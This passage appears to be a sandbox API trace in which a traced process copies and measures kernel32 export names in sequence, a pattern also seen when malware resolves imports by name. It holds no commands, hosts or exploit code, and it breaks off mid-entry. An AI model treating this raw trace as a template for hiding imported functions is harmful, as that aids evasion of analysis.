[0181.918] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0181.918] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0181.918] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0181.918] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0181.918] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0181.918] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0181.918] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0181.918] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0181.918] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0181.918] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0181.918] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0181.918] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0181.919] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0181.919] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0181.919] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0181.919] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0181.919] lstrlenA (lpString="COPYCONTEXT") returned 11 [0181.919] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0181.919] lstrlenA (lpString="COPYFILEA") returned 9 [0181.919] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0181.919] lstrlenA (lpString="COPYFILEEXA") returned 11 [0181.919] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0181.919] lstrlenA (lpString="COPYFILEEXW") returned 11 [0181.919] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0181.919] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0181.919] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0181.919] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0181.919] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0181.919] lstrlenA (lpString="COPYFILEW") returned 9 [0181.919] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0181.919] lstrlenA (lpString="COPYLZFILE") returned 10 [0181.919] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0181.919] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0181.919] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0181.919] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0181.919] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0181.919] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0181.919] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0181.919] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0181.919] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0181.919] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0181.919] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0181.919] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0181.919] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0181.919] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0181.919] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0181.920] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0181.920] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0181.920] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0181.920] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0181.920] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0181.920] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0181.920] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0181.920] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0181.920] lstrlenA (lpString="CREATEEVENTA") returned 12 [0181.920] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0181.920] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0181.920] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0181.920] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0181.920] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0181.920] lstrlenA (lpString="CREATEEVENTW") returned 12 [0181.920] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0181.921] lstrlenA (lpString="CREATEFIBER") returned 11 [0181.921] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0181.921] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0181.921] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0181.921] lstrlenA (lpString="CREATEFILEA") returned 11 [0181.921] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0181.921] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0181.921] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0181.921] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0181.921] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0181.921] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0181.921] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0181.921] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0181.921] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0181.921] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0181.921] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0181.921] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0181.921] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0181.921] lstrlenA (lpString="CREATEFILEW") returned 11 [0181.921] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0181.922] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0181.922] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0181.922] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0181.922] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0181.922] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0181.922] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0181.922] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0181.922] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0181.922] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0181.922] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0181.922] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0181.922] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0181.922] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0181.922] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0181.922] lstrlenA (lpString="CREATEJOBSET") returned 12 [0181.922] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0181.922] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0181.922] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0181.922] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0181.922] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0181.922] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0181.922] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0181.922] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0181.922] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0181.922] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0181.922] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0181.922] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0181.922] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0181.922] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0181.922] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0181.922] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0181.922] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0181.922] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0181.922] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0181.922] lstrlenA (lpString="CREATEPIPE") returned 10 [0181.923] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0181.923] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0181.923] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0181.923] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0181.923] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0181.923] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0181.923] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0181.923] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0181.923] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0181.923] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0181.923] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0181.923] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0181.923] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0181.923] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0181.923] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0181.923] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0181.923] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0181.923] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0181.923] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0181.923] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0181.923] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0181.923] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0181.923] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0181.923] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0181.923] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0181.923] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0181.923] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0181.923] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0181.923] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0181.923] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0181.923] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0181.923] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0181.923] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0181.923] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0181.923] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0181.924] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0181.924] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0181.924] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0181.924] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0181.924] lstrlenA (lpString="CREATETHREAD") returned 12 [0181.924] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0181.924] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0181.924] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0181.924] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0181.924] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0181.924] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0181.924] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0181.924] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0181.924] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0181.924] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0181.924] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0181.924] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0181.924] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0181.924] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0181.924] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0181.924] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0181.924] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0181.924] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0181.924] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0181.924] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0181.924] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0181.924] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0181.924] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0181.924] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0181.924] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0181.924] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0181.924] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0181.924] lstrlenA (lpString="CTRLROUTINE") returned 11 [0181.924] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0181.924] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0181.925] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0181.925] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0181.925] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0181.925] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0181.925] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0181.925] lstrlenA (lpString="DEBUGBREAK") returned 10 [0181.925] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0181.925] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0181.925] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0181.925] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0181.925] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0181.925] lstrlenA (lpString="DECODEPOINTER") returned 13 [0181.925] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0181.925] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0181.925] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0181.925] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0181.925] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0181.925] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0181.925] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0181.925] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0181.925] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0181.925] lstrlenA (lpString="DELETEATOM") returned 10 [0181.925] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0181.925] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0181.925] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0181.925] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0181.925] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0181.925] lstrlenA (lpString="DELETEFIBER") returned 11 [0181.925] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0181.925] lstrlenA (lpString="DELETEFILEA") returned 11 [0181.925] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0181.925] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0181.925] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0181.925] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0181.926] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0181.926] lstrlenA (lpString="DELETEFILEW") returned 11 [0181.926] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0181.926] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0181.926] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0181.926] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0181.926] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0181.926] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0181.926] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0181.926] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0181.926] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0181.926] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0181.926] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0181.926] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0181.926] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0181.926] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0181.926] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0181.926] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0181.926] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0181.926] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0181.926] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0181.926] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0181.926] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0181.926] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0181.926] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0181.926] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0181.926] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0181.926] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0181.926] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0181.926] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0181.926] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0181.926] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0181.926] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0181.926] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0181.926] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") 